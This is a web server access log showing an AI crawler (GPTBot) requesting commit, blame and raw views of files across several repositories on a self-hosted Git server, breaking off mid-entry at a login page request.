"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" +[17/Feb/2026:15:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12894] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-next-todo.md" +[17/Feb/2026:15:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 11725] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" +[17/Feb/2026:15:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json?display=source" [Client 74.7.227.38] [Length 11262] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:15:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" +[17/Feb/2026:15:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2finit_db.py" [Client 74.7.227.38] [Length 29677] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" +[17/Feb/2026:15:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fimport_csv.py" [Client 74.7.227.38] [Length 27419] [Gzip 4.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" +[17/Feb/2026:15:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49522] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" +[17/Feb/2026:15:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49519] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" +[17/Feb/2026:15:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" [Client 74.7.227.38] [Length 49522] [Gzip 26.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" +[17/Feb/2026:15:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" +[17/Feb/2026:15:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" +[17/Feb/2026:15:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" +[17/Feb/2026:15:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" +[17/Feb/2026:15:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" +[17/Feb/2026:15:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12949] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj" +[17/Feb/2026:15:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 120351] [Gzip 14.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:15:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 212854] [Gzip 13.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:15:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/database.sqlite" +[17/Feb/2026:15:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" [Client 74.7.227.38] [Length 10107] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/Nuget%EC%97%90%20OPC%20UA%20%EB%9D%BC%EC%9D%B4%EB%B8%8C%EB%9F%AC%EB%A6%AC%EC%84%A4%EC%B9%98.md" +[17/Feb/2026:15:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" +[17/Feb/2026:15:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" +[17/Feb/2026:15:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" +[17/Feb/2026:15:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 11034] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook" +[17/Feb/2026:15:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv" [Client 74.7.227.38] [Length 56061] [Gzip 9.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" +[17/Feb/2026:15:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fmain.py" [Client 74.7.227.38] [Length 36353] [Gzip 7.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" +[17/Feb/2026:15:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:15:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12749] [Gzip 6.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:15:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 1916] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" +[17/Feb/2026:15:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" +[17/Feb/2026:15:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10881] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" +[17/Feb/2026:15:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile?display=source" [Client 74.7.227.38] [Length 11593] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" +[17/Feb/2026:15:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile?display=source" [Client 74.7.227.38] [Length 11592] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" +[17/Feb/2026:15:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:15:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 29] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:15:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 10047] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:15:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 74.7.227.38] [Length 14578] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:15:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" +[17/Feb/2026:15:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15765] [Gzip 4.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/README.md" +[17/Feb/2026:15:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15798] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" +[17/Feb/2026:15:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 12782] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js" +[17/Feb/2026:15:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11283] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/metadata.json" +[17/Feb/2026:15:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/status.json" +[17/Feb/2026:15:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/tsconfig.json" +[17/Feb/2026:15:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10887] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" +[17/Feb/2026:15:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" +[17/Feb/2026:15:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json?display=source" [Client 74.7.227.38] [Length 11060] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" +[17/Feb/2026:15:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html" [Client 74.7.227.38] [Length 11545] [Gzip 5.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets" [Client 74.7.227.38] [Length 11038] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/types.ts" [Client 74.7.227.38] [Length 11706] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/vite.config.ts" [Client 74.7.227.38] [Length 12136] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/.gitignore" [Client 74.7.227.38] [Length 11672] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services" [Client 74.7.227.38] [Length 10143] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" +[17/Feb/2026:15:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 